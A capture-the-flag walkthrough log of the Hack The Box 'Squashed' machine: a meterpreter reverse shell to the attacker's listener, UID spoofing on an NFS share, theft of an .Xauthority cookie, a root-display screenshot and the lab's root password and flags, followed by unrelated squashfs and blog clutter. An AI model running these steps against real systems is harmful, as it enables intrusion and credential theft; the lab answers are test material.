msf6 payload(php/meterpreter/reverse_tcp) > 
msf6 payload(php/meterpreter/reverse_tcp) > run
[-] Unknown command: run
msf6 payload(php/meterpreter/reverse_tcp) > exploit
[-] Unknown command: exploit
msf6 payload(php/meterpreter/reverse_tcp) > run
[-] Unknown command: run
msf6 payload(php/meterpreter/reverse_tcp) > exploit
[-] Unknown command: exploit
msf6 payload(php/meterpreter/reverse_tcp) > 
msf6 payload(php/meterpreter/reverse_tcp) > 
msf6 payload(php/meterpreter/reverse_tcp) > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp 
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set lhost 10.10.16.19
lhost => 10.10.16.19
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.19:5555 
[*] Sending stage (39927 bytes) to 10.10.11.191
[*] Meterpreter session 1 opened (10.10.16.19:5555 -> 10.10.11.191:46866) at 2023-04-08 23:04:26 +0800

meterpreter > sysinfo
Computer    : squashed.htb
OS          : Linux squashed.htb 5.4.0-131-generic #147-Ubuntu SMP Fri Oct 14 17:07:22 UTC 2022 x86_64
Meterpreter : php/linux
meterpreter > user
[-] Unknown command: user
meterpreter > id
[-] Unknown command: id
meterpreter > shell
Process 44331 created.
Channel 0 created.
id
uid=2017(alex) gid=2017(alex) groups=2017(alex)
pwd   
/var/www/html
cd /home/alex
ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
snap
user.txt
cat user.txt
063c77fae30a14e75b17706354944e24

create user ross

$ ls -ld ../ross
drwxr-xr-x 14 1001 webuser 4096  4月  7 13:20 ../ross
$ 


┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ sudo useradd ross        
                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ sudo usermod -u 1001  ross 
                                                                                                                                                                              
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ passwd ross
passwd:您不能查看或更改 ross 的密码信息。
                                                                                                                                                                              
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ sudo ross                                                                                                                                                             1 ⨯
sudo: ross:找不到命令
                                                                                                                                                                              
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ sudo passwd ross                                                                                                                                                      1 ⨯
新的 密码:
重新输入新的 密码:
passwd:已成功更新密码

su ross

┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed/ross]
└─$ su ross  
密码:
$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos
$ tree -a


$ ls -al
总用量 68
drwxr-xr-x 14 ross webuser 4096  4月  7 13:20 .
drwxr-xr-x  6 kwkl kwkl    4096  4月  8 23:11 ..
lrwxrwxrwx  1 root root       9 10月 20 21:24 .bash_history -> /dev/null
drwx------ 11 ross webuser 4096 10月 21 22:57 .cache
drwx------ 12 ross webuser 4096 10月 21 22:57 .config
drwxr-xr-x  2 ross webuser 4096 10月 21 22:57 Desktop
drwxr-xr-x  2 ross webuser 4096 10月 21 22:57 Documents
drwxr-xr-x  2 ross webuser 4096 10月 21 22:57 Downloads
drwx------  3 ross webuser 4096 10月 21 22:57 .gnupg
drwx------  3 ross webuser 4096 10月 21 22:57 .local
drwxr-xr-x  2 ross webuser 4096 10月 21 22:57 Music
drwxr-xr-x  2 ross webuser 4096 10月 21 22:57 Pictures
drwxr-xr-x  2 ross webuser 4096 10月 21 22:57 Public
drwxr-xr-x  2 ross webuser 4096 10月 21 22:57 Templates
drwxr-xr-x  2 ross webuser 4096 10月 21 22:57 Videos
lrwxrwxrwx  1 root root       9 10月 21 21:07 .viminfo -> /dev/null
-rw-------  1 ross webuser   57  4月  7 13:20 .Xauthority
-rw-------  1 ross webuser 2475  4月  7 13:20 .xsession-errors
-rw-------  1 ross webuser 2475 12月 27 23:33 .xsession-errors.old
$ cp .Xauthority
cp: 在'.Xauthority' 后缺少了要操作的目标文件
请尝试执行 "cp --help" 来获取更多信息。
$ cp .Xauthority
cp: 在'.Xauthority' 后缺少了要操作的目标文件
请尝试执行 "cp --help" 来获取更多信息。
$ cp .Xauthority /tmp
$ 
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ sudo cp  /tmp/.Xauthority ./                                                                                                                                          1 ⨯
                                                                                                                                                                              
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ ls
html  htnl  keepass.hash  Passwords.kdbx  ross  shell.php  webhtml
                                                                                                                                                                              
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ ls                    
html  htnl  keepass.hash  Passwords.kdbx  ross  shell.php  webhtml
                                                                                                                                                                              
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ ls -al    
总用量 36
drwxr-xr-x  6 kwkl    kwkl     4096  4月  8 23:50 .
drwxr-xr-x 14 kwkl    kwkl     4096  4月  8 22:12 ..
drwxr-xr-x 14 ross    webuser  4096  4月  7 13:20 html
drwxr-xr-x  2 kwkl    kwkl     4096  4月  8 22:23 htnl
-rw-r--r--  1 kwkl    kwkl        0  4月  8 23:41 keepass.hash
-rw-r--r--  1 kwkl    kwkl     1365  4月  8 23:11 Passwords.kdbx
drwxr-xr-x 14 ross    webuser  4096  4月  7 13:20 ross
-rwxrwxrwx  1 kwkl    kwkl     1112  4月  8 22:57 shell.php
drwxr-xr--  5 webuser www-data 4096  4月  8 23:50 webhtml
-rw-------  1 root    root       57  4月  8 23:50 .Xauthority
                                                                                                                                                                              
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ chmod 777 .Xauthority 
chmod: 正在更改 '.Xauthority' 的权限: 不允许的操作
                                                                                                                                                                              
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ ls                                                                                                                                                                    1 ⨯
html  htnl  keepass.hash  Passwords.kdbx  ross  shell.php  webhtml
                                                                                                                                                                              
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ sudo chmod 777 .Xauthority
                                                                                                                                                                              
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ ls -al
总用量 36
drwxr-xr-x  6 kwkl    kwkl     4096  4月  8 23:50 .
drwxr-xr-x 14 kwkl    kwkl     4096  4月  8 22:12 ..
drwxr-xr-x 14 ross    webuser  4096  4月  7 13:20 html
drwxr-xr-x  2 kwkl    kwkl     4096  4月  8 22:23 htnl
-rw-r--r--  1 kwkl    kwkl        0  4月  8 23:41 keepass.hash
-rw-r--r--  1 kwkl    kwkl     1365  4月  8 23:11 Passwords.kdbx
drwxr-xr-x 14 ross    webuser  4096  4月  7 13:20 ross
-rwxrwxrwx  1 kwkl    kwkl     1112  4月  8 22:57 shell.php
drwxr-xr--  5 webuser www-data 4096  4月  8 23:50 webhtml
-rwxrwxrwx  1 root    root       57  4月  8 23:50 .Xauthority
                                                                                                                                                                              
┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ python3 -m http.server 3333
Serving HTTP on 0.0.0.0 port 3333 (http://0.0.0.0:3333/) ...
10.10.16.19 - - [08/Apr/2023 23:51:35] "GET / HTTP/1.1" 200 -
10.10.16.19 - - [08/Apr/2023 23:51:35] code 404, message File not found
10.10.16.19 - - [08/Apr/2023 23:51:35] "GET /favicon.ico HTTP/1.1" 404 -
10.10.16.19 - - [08/Apr/2023 23:51:38] "GET /.Xauthority HTTP/1.1" 200 -
10.10.11.191 - - [08/Apr/2023 23:53:42] "GET /.Xauthority HTTP/1.1" 200 -

squash wget the .Xauthority

/var/www/html
cd /home/alex
pwd
j/home/alex
ls -al
total 80
drwxr-xr-x 15 alex alex  4096 Apr  8 08:45 .
drwxr-xr-x  4 root root  4096 Oct 21 14:57 ..
-rw-rw-rw-  1 alex alex    57 Apr  8 08:27 .Xauthority
lrwxrwxrwx  1 root root     9 Oct 17 13:23 .bash_history -> /dev/null
drwxr-xr-x  8 alex alex  4096 Oct 21 14:57 .cache
drwx------  8 alex alex  4096 Oct 21 14:57 .config
drwx------  3 alex alex  4096 Apr  7 07:58 .gnupg
drwx------  3 alex alex  4096 Oct 21 14:57 .local
-rw-------  1 alex alex 12288 Apr  8 08:05 .swp
lrwxrwxrwx  1 root root     9 Oct 21 13:06 .viminfo -> /dev/null
drwxr-xr-x  2 alex alex  4096 Oct 21 14:57 Desktop
drwxr-xr-x  2 alex alex  4096 Oct 21 14:57 Documents
drwxr-xr-x  2 alex alex  4096 Oct 21 14:57 Downloads
drwxr-xr-x  2 alex alex  4096 Oct 21 14:57 Music
drwxr-xr-x  2 alex alex  4096 Oct 21 14:57 Pictures
drwxr-xr-x  2 alex alex  4096 Oct 21 14:57 Public
drwxr-xr-x  2 alex alex  4096 Oct 21 14:57 Templates
drwxr-xr-x  2 alex alex  4096 Oct 21 14:57 Videos
drwx------  3 alex alex  4096 Oct 21 14:57 snap
-rw-r-----  1 root alex    33 Apr  7 05:21 user.txt
wget http://10.10.16.19:3333/.Xauthority -O /tmp/.Xauthority
--2023-04-08 15:53:45--  http://10.10.16.19:3333/.Xauthority
Connecting to 10.10.16.19:3333... connected.
HTTP request sent, awaiting response... 200 OK
Length: 57 [application/octet-stream]
Saving to: '/tmp/.Xauthority'

     0K                                                       100% 8.11M=0s

2023-04-08 15:53:46 (8.11 MB/s) - '/tmp/.Xauthority' saved [57/57]

Get the root’s desktop pic

ls /tmp
0xdf.xwd
CVE-2021-3560.py
linpeas.sh
pspy64
screenshot.xwd
tmux-2017
^[[A^[[D    : not found
/bin/sh: 11: 
ls -al /tmp
total 7600
drwxrwxrwt  3 root root    4096 Apr  8 09:12 .
drwxr-xr-x 20 root root    4096 Oct 21 14:57 ..
-rw-rw-rw-  1 alex alex      57 Apr  8 15:50 .Xauthority
-rw-rw-rw-  1 alex alex 1923179 Apr  8 09:12 0xdf.xwd
-rw-rw-rw-  1 alex alex    2434 Apr  7 07:58 CVE-2021-3560.py
-rw-rw-rw-  1 alex alex  828087 Jan  8 04:26 linpeas.sh
-rwxrwxrwx  1 alex alex 3078592 Dec  6  2021 pspy64
-rw-r--r--  1 alex alex 1923179 Apr  7 08:23 screenshot.xwd
drwx------  2 alex alex    4096 Apr  7 07:58 tmux-2017
XAUTHORITY=/tmp/.Xauthority xwd -root -screen -silent -display :0 > /tmp/haha.xwd    
ls /tmp
ls /tmp
0xdf.xwd
CVE-2021-3560.py
haha.xwd
linpeas.sh
pspy64
screenshot.xwd
tmux-2017
cp haha.xwd /var/www/html
cp: cannot stat 'haha.xwd': No such file or directory
chmod 777 /var/www/html/haha.xwd
ls /var/www/html
ls /var/www/html
css
haha.xwd
images
index.html
js

Wget the haha.xwd

┌──(kwkl㉿kwkl)-[~/HODL/htb/squashed]
└─$ wget http://10.10.11.191/haha.xwd               
--2023-04-08 23:57:11--  http://10.10.11.191/haha.xwd
正在连接 10.10.11.191:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:1923179 (1.8M) [image/x-xwindowdump]
正在保存至: “haha.xwd”

haha.xwd                                    100%[=========================================================================================>]   1.83M  21.7KB/s  用时 3m 4s   

2023-04-09 00:00:44 (10.2 KB/s) - 已保存 “haha.xwd” [1923179/1923179])

image-20230409095450335

su root & get the flag

css
haha.xwd
images
index.html
js
ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
snap
user.txt
su root
Password: cah$mei7rai9A
id
uid=0(root) gid=0(root) groups=0(root)
cd   
pwd
/root
ls
Desktop
Documents
Downloads
Music
Pictures
Public
root.txt
scripts
snap
Templates
Videos
cat root.txt
0be4464430d6acfe6e2c26982f70b7a4

[*] 10.10.11.191 - Meterpreter session 1 closed.  Reason: Died

Ref:[https://www.jianshu.com/p/ef5201d9ffe7]
(https://www.jianshu.com/p/ef5201d9ffe7)
Squashed HTB Writeup https://www.jianshu.com/p/ef5201d9ffe7

32进制
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Squashed Merge Message-crx插件
04-02
语言:English (United States) 使用拉出请求说明作为压扁和合并的提交消息 github.com的一个扩展,用于自动使用南瓜和合并提交消息的拉出请求描述。 </ div>
git-delete-squashed:删除已被压缩并合并到master中的分支
02-03
git删除删除 这是一个工具,可删除所有已“压合并”到主菜单中的git分支。 如果您在将分支压缩为master的项目中工作,这将很有用。 分支压缩并合并后,可以使用此工具清理本地分支。 用法 SH 要作为shellscript运行,只需复制以下命令(建议设置别名)。 无需克隆存储库。 git checkout -q master && git for-each-ref refs/heads/ " --format=%(refname:short) " | while read branch ; do mergeBase= $( git merge-base master $branch ) && [[ $( git cherry master $( git commit-tree $( git rev-parse $branch \^ {tree} ) -p $mergeBase -m _ ) ) == " - " * ]] && git branch -D $branch ; done Node.js 您还可以从NPM将该工具作为Node.js软件包安装。 (软件包代码在此仓
红日三打靶!!!
woshicainiao666的博客
02-02 651
网站的IP地址明明是192.168.0.101,但是ip a命令,看到IP地址是192.168.93.120。>在/tmp/mysql/test.txt中发现账号密码 wwwuser/wwwuser_123Aqx。web-cenctos,开启后要输入/etc/init.d/network restart 重启网卡。将文件中的bypass_disablefunc.php上传到网站根路径/var/www/html/将bypass_disablefunc_x64.so上传到/var/www/下。
H.264编码, 视频监控的必选
08-06
H264编码开源代码 Video Usability Information (VUI) Guide by Christian Heine ( sennindemokrit at gmx dot net ) 1. Sample Aspect Ratio ----------------------- * What is it? The Sample Aspect Ratio (SAR) (sometimes called Pixel Aspect Ratio or just Pel Aspect Ratio) is defined as the ratio of the width of the sample to the height of the sample. While pixels on a computer monitor generally are "square" meaning that their SAR is 1:1, digitized video usually has rather odd SARs. Playback of material with a particular SAR on a system with a different SAR will result in a stretched/squashed image. A correction is necessary that relies on the knowledge of both SARs. * How do I use it? You can derive the SAR of an image from the width, height and the display aspect ratio (DAR) of the image as follows: SAR_x DAR_x * height ----- = -------------- SAR_y DAR_y * width for example: width x height = 704x576, DAR = 4:3 ==> SAR = 2304:2112 or 12:11 Please note that if your material is a digitized analog signal, you should not use this equation to calculate the SAR. Refer to the manual of your digitizing equipment or this link instead. A Quick Guide to Digital Video Resolution and Aspect Ratio Conversions http://www.iki.fi/znark/video/conversion/ * Should I use this option? In one word: yes. Most decoders/ media players nowadays support automatic correction of aspect ratios, and there are just few exceptions. You should even use it, if the SAR of your material is 1:1, as the default of x264 is "SAR not defined".
squashfs1.3r3.tar.gz
04-21
SQUASHFS 1.3r3 - A squashed read-only filesystem for Linux Copyright 2004 Phillip Lougher ([email protected]) Released under the GPL licence (version 2 or later). Squashfs is currently at version 1.3 release 3. Please see the CHANGES file for recent changes to squashfs. Squashfs is a highly compressed read-only filesystem for Linux. It uses zlib compression to compress both files, inodes and directories. Inodes in the system are very small and all blocks are packed to minimise data overhead. Block sizes greater than 4K are supported up to a maximum of 32K. Squashfs is intended for general read-only filesystem use, for archival use (i.e. in cases where a .tar.gz file may be used), and in constrained block device/memory systems (e.g. embedded systems) where low overhead is needed. The section 'mksquashfs' gives information on using the mksquashfs tool to create and append to squashfs filesystems. The 'using squashfs' section gives information on mounting and using squashfs filesystems stored on block devices and as normal files using the loopback device. 1. Squashfs overview -------------------- 1. Data, inodes and directories are compressed. 2. Squashfs stores full uid/gids (32 bits), and file creation time. 3. Files up to 2^32 bytes are supported. Filesystems can be up to 2^32 bytes. 4. Inode and directory data are highly compacted, and packed on byte boundaries. Each compressed inode is on average 8 bytes in length (the exact length varies on file type, i.e. regular file, directory, symbolic link, and block/char device inodes have different sizes). 5. Squashfs can use block sizes up to 32K (the default size is 32K). Using 32K blocks achieves greater compression ratios than the normal 4K block size. 6. File duplicates are detected and removed. 7. Both big and little endian architectures are supported. Squashfs can mount filesystems created on different byte order machines. 2. mksquashfs ------------- As squashfs is a read-only filesystem, the mksquashfs program must be used to create populated squashfs filesystems. Beginning with Squashfs 1.2, mksquashfs will also append directories and files to pre-existing squashfs filesystems, see the following 'appending to squashfs filesystems' subsection. SYNTAX:mksquashfs source1 source2 ... dest [options] [-e list of exclude dirs/files] Options are -info print files written to filesystem -b block size size of blocks in filesystem, default 32768 -noappend Do not append to existing filesystem on dest, write a new filesystem This is the default action if dest does not exist, or if no filesystem is on it -keep-as-directory If one source directory is specified, create a root directory containing that directory, rather than the contents of the directory -root-becomes name When appending source files/directories, make the original root become a subdirectory in the new root called name, rather than adding the new source items to the original root -noI -noInodeCompression do not compress inode table -noD -noDataCompression do not compress data blocks -nopad do not pad filesystem to a multiple of 4K -check_data add checkdata for greater filesystem checks -le create a little endian filesystem -be create a big endian filesystem -ef exclude file file is a list of exclude dirs/files - one per line -version print version, licence and copyright message Source1 source2 ... are the source directories/files containing the files/directories that will form the squashfs filesystem. If a single directory is specified (i.e. mksquashfs source output_fs) the squashfs filesystem will consist of that directory, with the top-level root directory corresponding to the source directory. If multiple source directories or files are specified, mksquashfs will merge the specified sources into a single filesystem, with the root directory containing each of the source files/directories. The name of each directory entry will be the basename of the source path. If more than one source entry maps to the same name, the conflicts are named xxx_1, xxx_2, etc. where xxx is the original name. To make this clear, take two example directories. Source directory "/home/phillip/test" contains "file1", "file2" and "dir1". Source directory "goodies" contains "goodies1", "goodies2" and "goodies3". usage example 1: %mksquashfs /home/phillip/test output_fs This will generate a squashfs filesystem with root entries "file1", "file2" and "dir1". example 2: %mksquashfs /home/phillip/test goodies output_fs This will create a squashfs filesystem with the root containing entries "test" and "goodies" corresponding to the source directories "/home/phillip/test" and "goodies". example 3: %mksquashfs /home/phillip/test goodies test output_fs This is the same as the previous example, except a third source directory "test" has been specified. This conflicts with the first directory named "test" and will be renamed "test_1". Multiple sources allow filesystems to be generated without needing to copy all source files into a common directory. This simplifies creating filesystems. The -keep-as-directory option can be used when only one source directory is specified, and you wish the root to contain that directory, rather than the contents of the directory. For example: example 4: %mksquashfs /home/phillip/test output_fs -keep-as-directory This is the same as example 1, except for -keep-as-directory. This will generate a root directory containing directory "test", rather than the "test" directory contents "file1", "file2" and "dir1". The Dest argument is the destination where the squashfs filesystem will be written. This can either be a conventional file or a block device. If the file doesn't exist it will be created, if it does exist and a squashfs filesystem exists on it, mksquashfs will append. The -noappend option will write a new filesystem irrespective of whether an existing filesystem is present. The -e and -ef options allow files/directories to be specified which are excluded from the output filesystem. The -e option takes the exclude files/directories from the command line, the -ef option takes the exlude files/directories from the specified exclude file, one file/directory per line. If an exclude file/directory is absolute (i.e. prefixed with /, ../, or ./) the entry is treated as absolute, however, if an exclude file/directory is relative, it is treated as being relative to each of the sources in turn, i.e. %mksquashfs /tmp/source1 source2 output_fs -e ex1 /tmp/source1/ex2 out/ex3 Will generate exclude files /tmp/source1/ex2, /tmp/source1/ex1, source2/ex1, /tmp/source1/out/ex3 and source2/out/ex3. The -e and -ef exclude options are usefully used in archiving the entire filesystem, where it is wished to avoid archiving /proc, and the filesystem being generated, i.e. %mksquashfs / /tmp/root.sqsh -e proc /tmp/root.sqsh Multiple -ef options can be specified on the command line, and the -ef option can be used in conjuction with the -e option. The -info option displays the files/directories as they are compressed and added to the filesystem. The compression percentage achieved is printed, with the original uncompressed size. If the compression percentage is listed as 0% it means the file is a duplicate. The -b option allows the block size to be selected, this can be either 512, 1024, 2048, 4096, 8192, 16384, or 32768 bytes. The -noI and -noD options (also -noInodeCompression and -noDataCompression) can be used to force mksquashfs to not compress inodes/directories and data respectively. Giving both options generates an uncompressed filesystem. The -le and -be options can be used to force mksquashfs to generate a little endian or big endian filesystem. Normally mksquashfs will generate a filesystem in the host byte order. Squashfs, for portability, will mount different ordered filesystems (i.e. it can mount big endian filesystems running on a little endian machine), but these options can be used for greater optimisation. The -nopad option informs mksquashfs to not pad the filesystem to a 4K multiple. This is performed by default to enable the output filesystem file to be mounted by loopback, which requires files to be a 4K multiple. If the filesystem is being written to a block device, or is to be stored in a bootimage, the extra pad bytes are not needed. 2.1 appending to squashfs filesystems ------------------------------------- Beginning with squashfs1.2, mksquashfs can append to existing squashfs filesystems. Three extra options "-noappend", "-keep-as-directory", and "root-becomes" have been added. Running squashfs with the destination directory containing an existing filesystem, will add the source items to the existing filesystem. By default, the source items are added to the existing root directory. To make this clear... An existing filesystem "image" contains root entries "old1", and "old2". Source directory "/home/phillip/test" contains "file1", "file2" and "dir1". example 1: %mksquashfs /home/phillip/test image Will create a new "image" with root entries "old1", "old2", "file1", "file2" and "dir1" example 2: %mksquashfs /home/phillip/test image -keep-as-directory Will create a new "image" with root entries "old1", "old2", and "test". As shown in the previous section, for single source directories '-keep-as-directory' adds the source directory rather than the contents of the directory. example 3: %mksquashfs /home/phillip/test image -keep-as-directory -root-becomes original-root Will create a new "image" with root entries "original-root", and "test". The '-root-becomes' option specifies that the original root becomes a subdirectory in the new root, with the specified name. The append option with file duplicate detection, means squashfs can be used as a simple versioning archiving filesystem. A squashfs filesystem can be created with for example the linux-2.4.19 source. Appending the linux-2.4.20 source will create a filesystem with the two source trees, but only the changed files will take extra room, the unchanged files will be detected as duplicates. 3. Using squashfs ----------------- Squashfs filesystems should be mounted with 'mount' with the filesystem type 'squashfs'. If the filesystem is on a block device, the filesystem can be mounted directly, e.g. %mount -t squashfs /dev/sda1 /mnt Will mount the squashfs filesystem on "/dev/sda1" under the directory "/mnt". If the squashfs filesystem has been written to a file, the loopback device can be used to mount it (loopback support must be in the kernel), e.g. %mount -t squashfs image /mnt -o loop Will mount the squashfs filesystem in the file "image" under the directory "/mnt". 4. Filesystem layout -------------------- Brief filesystem design notes follow. A squashfs filesystem consists of five parts, packed together on a byte alignment: --------------- | superblock | |---------------| | data | | blocks | |---------------| | inodes | |---------------| | directories | |---------------| | uid/gid | | lookup table | --------------- Compressed data blocks are written to the filesystem as files are read from the source directory, and checked for duplicates. Once all file data has been written the completed inode, directory and uid/gid lookup tables are written. 4.1 Metadata ------------ Metadata (inodes and directories) are compressed in 8Kbyte blocks. Each compressed block is prefixed by a two byte length, the top bit is set if the block is uncompressed. A block will be uncompressed if the -noI option is set, or if the compressed block was larger than the uncompressed block. Inodes are packed into the metadata blocks, and are not aligned to block boundaries, therefore inodes overlap compressed blocks. An inode is identified by a two field tuple <start address of compressed block : offset into de-compressed block>. Inode contents vary depending on the file type. The base inode consists of: base inode: Inode type Mode uid index gid index The inode type is 4 bits in size, and the mode is 12 bits. The uid and gid indexes are 4 bits in length. Ordinarily, this will allow 16 unique indexes into the uid table. To minimise overhead, the uid index is used in conjunction with the spare bit in the file type to form a 48 entry index as follows: inode type 1 - 5: uid index = uid inode type 5 -10: uid index = 16 + uid inode type 11 - 15: uid index = 32 + uid In this way 48 unique uids are supported using 4 bits, minimising data inode overhead. The 4 bit gid index is used to index into a 15 entry gid table. Gid index 15 is used to indicate that the gid is the same as the uid. This prevents the 15 entry gid table filling up with the common case where the uid/gid is the same. The data contents of symbolic links are stored immediately after the symbolic link inode, inside the inode table. This allows the normally small symbolic link to be compressed as part of the inode table, achieving much greater compression than if the symbolic link was compressed individually. Similarly, the block index for regular files is stored immediately after the regular file inode. The block index is a list of block lengths (two bytes each), rather than block addresses, saving two bytes per block. The block address for a given block is computed by the summation of the previous block lengths. This takes advantage of the fact that the blocks making up a file are stored contiguously in the filesystem. The top bit of each block length is set if the block is uncompressed, either because the -noD option is set, or if the compressed block was larger than the uncompressed block. 4.2 Directories --------------- Like inodes, directories are packed into the metadata blocks, and are not aligned on block boundaries, therefore directories can overlap compressed blocks. A directory is, again, identified by a two field tuple <start address of compressed block containing directory start : offset into de-compressed block>. Directories are organised in a slightly complex way, and are not simply a list of file names and inode tuples. The organisation takes advantage of the observation that in most cases, the inodes of the files in the directory will be in the same compressed metadata block, and therefore, the inode tuples will have the same start block. Directories are therefore organised in a two level list, a directory header containing the shared start block value, and a sequence of directory entries, each of which share the shared start block. A new directory header is written once/if the inode start block changes. The directory header/directory entry list is repeated as many times as necessary. The organisation is as follows: directory_header: count (8 bits) inode start block (24 bits) directory entry: * count inode offset (13 bits) inode type (3 bits) filename size (8 bits) filename This organisation saves on average 3 bytes per filename. 4.3 File data ------------- File data is compressed on a block by block basis and written to the filesystem. The filesystem supports up to 32K blocks, which achieves greater compression ratios than the Linux 4K page size. The disadvantage with using greater than 4K blocks (and the reason why most filesystems do not), is that the VFS reads data in 4K pages. The filesystem reads and decompresses a larger block containing that page (e.g. 32K). However, only 4K can be returned to the VFS, resulting in a very inefficient filesystem, as 28K must be thrown away. Squashfs, solves this problem by explicitly pushing the extra pages into the page cache. 5. Author info -------------- Squashfs was written by Phillip Lougher, email [email protected], in Chepstow, Wales, UK. If you like the program, or have any problems, then please email me, as it's nice to get feedback!
HackTheBox:Hack The Box笔测试和挑战
03-08
哈克盒子 Hack The Box笔测试和来自挑战 在这里,我们有Hack The Box的演练。
本人网站永久域名!
逍遥行工作室
09-08 23万+
最新消息,本站启用永久域名,欢迎大家常来做客 O(∩_∩)O~     目前我的网站子域名如下 主站:http://www.yangping.net 博客:http://blog.yangping.net 论坛:http://bbs.yangping.net 网盘:http://disk.yangping.net
hackthebox(HTB) Ambassdor !
qq_58869808的博客
12-08 4773
hackthebox(HTB) Ambassdor !
www.akmwzjt.net/index.php,FuseQRCode/index.html at 0221cc7b6cdc5324c71e1e2f67df0e1c466577f0 · Liam02...
热门推荐
weixin_29317963的博客
03-23 35万+
background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUYAAABuCAIAAADUPS1IAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAIGNIUk0AAHolAACAgwAA+f8AAIDpAAB1MAAA6mAAADqYAAAXb5JfxUYAAGwWSURBVHja7L1plJ3VdSZ...
TOJ3216 我要4444
weixin_30287169的博客
02-21 4660
传送门 http://acm.tzc.edu.cn/acmhome/problemdetail.do?&method=showdetail&id=3216 时间限制(普通/Java):1000MS/3000MS 内存限制:65536KByte 描述 M国的车牌号只有4位,别人都很想要8888,6666,3333等,但是Mr.L很奇怪,他想要4444…… M国的...
port常用和不常用端口一览表
凌风探梅的专栏
07-22 4万+
1 tcpmux tcp port service multiplexer 传输控制协议端口服务多路开关选择器 2 compressnet management utility     compressnet 管理实用程序 3 compressnet compression process    压缩进程 5 rje remote job entry          远程作业登录 7 e
Non-squashed merge ALERT!-crx插件
04-02
语言:English 如果用户正在合并PR而没有压缩Github的提交,则发出警报 在主分支中合并PR时,Github为您提供合并或不合并“ squash commits”选项的选项。 但是,没有办法将合并和“挤压选项”设置为默认值,而无需在手动选择“合并和挤压”后实际合并PR。 如果用户单击“不压缩合并”选项,此插件将显示一个浏览器确认弹出窗口,以防止无用的提交消息最​​终出现在您的主分支中。
casal:一个用于做 CASA 事情的开源库
06-01
卡萨尔 ###让 CASA 的生活更轻松 val json = Source .fromURL( " http://casa.com/out.payloads " ).mkString val entities = parse(json).extract[ List [ Entity ]] val translated = entities.map( Casa . Transforms . ADJINTRANSLATE ) val squashed = translated.map( Casa . Transforms . ADJINSQUASH ) ###Include 在你的项目中:如果你使用 scala/sbt,你可以包含这个项目: resolvers + = " Learning Objects Bintray Repo " at " https://dl.bintray.
squashfs2.2-r2.tar.gz
04-21
SQUASHFS 2.2 - A squashed read-only filesystem for Linux Copyright 2005 Phillip Lougher ([email protected]) Released under the GPL licence (version 2 or later). Welcome to Squashfs version 2.2-r2. Please see the CHANGES file for details of changes. Squashfs is a highly compressed read-only filesystem for Linux. It uses zlib compression to compress both files, inodes and directories. Inodes in the system are very small and all blocks are packed to minimise data overhead. Block sizes greater than 4K are supported up to a maximum of 64K. Squashfs is intended for general read-only filesystem use, for archival use (i.e. in cases where a .tar.gz file may be used), and in constrained block device/memory systems (e.g. embedded systems) where low overhead is needed. 1. SQUASHFS OVERVIEW -------------------- 1. Data, inodes and directories are compressed. 2. Squashfs stores full uid/gids (32 bits), and file creation time. 3. Files up to 2^32 bytes are supported. Filesystems can be up to 2^32 bytes. 4. Inode and directory data are highly compacted, and packed on byte boundaries. Each compressed inode is on average 8 bytes in length (the exact length varies on file type, i.e. regular file, directory, symbolic link, and block/char device inodes have different sizes). 5. Squashfs can use block sizes up to 64K (the default size is 64K). Using 64K blocks achieves greater compression ratios than the normal 4K block size. 6. File duplicates are detected and removed. 7. Both big and little endian architectures are supported. Squashfs can mount filesystems created on different byte order machines. 2. USING SQUASHFS ----------------- Squashfs filesystems should be mounted with 'mount' with the filesystem type 'squashfs'. If the filesystem is on a block device, the filesystem can be mounted directly, e.g. %mount -t squashfs /dev/sda1 /mnt Will mount the squashfs filesystem on "/dev/sda1" under the directory "/mnt". If the squashfs filesystem has been written to a file, the loopback device can be used to mount it (loopback support must be in the kernel), e.g. %mount -t squashfs image /mnt -o loop Will mount the squashfs filesystem in the file "image" under the directory "/mnt". 3. MKSQUASHFS ------------- 3.1 Mksquashfs options and overview. ------------------------------------ As squashfs is a read-only filesystem, the mksquashfs program must be used to create populated squashfs filesystems. SYNTAX:mksquashfs source1 source2 ... dest [options] [-e list of exclude dirs/files] Options are -version print version, licence and copyright message -info print files written to filesystem -b <block_size> set data block to <block_size>. Default 65536 bytes -2.0 create a 2.0 filesystem -noI do not compress inode table -noD do not compress data blocks -noF do not compress fragment blocks -no-fragments do not use fragments -always-use-fragments use fragment blocks for files larger than block size -no-duplicates do not perform duplicate checking -noappend do not append to existing filesystem -keep-as-directory if one source directory is specified, create a root 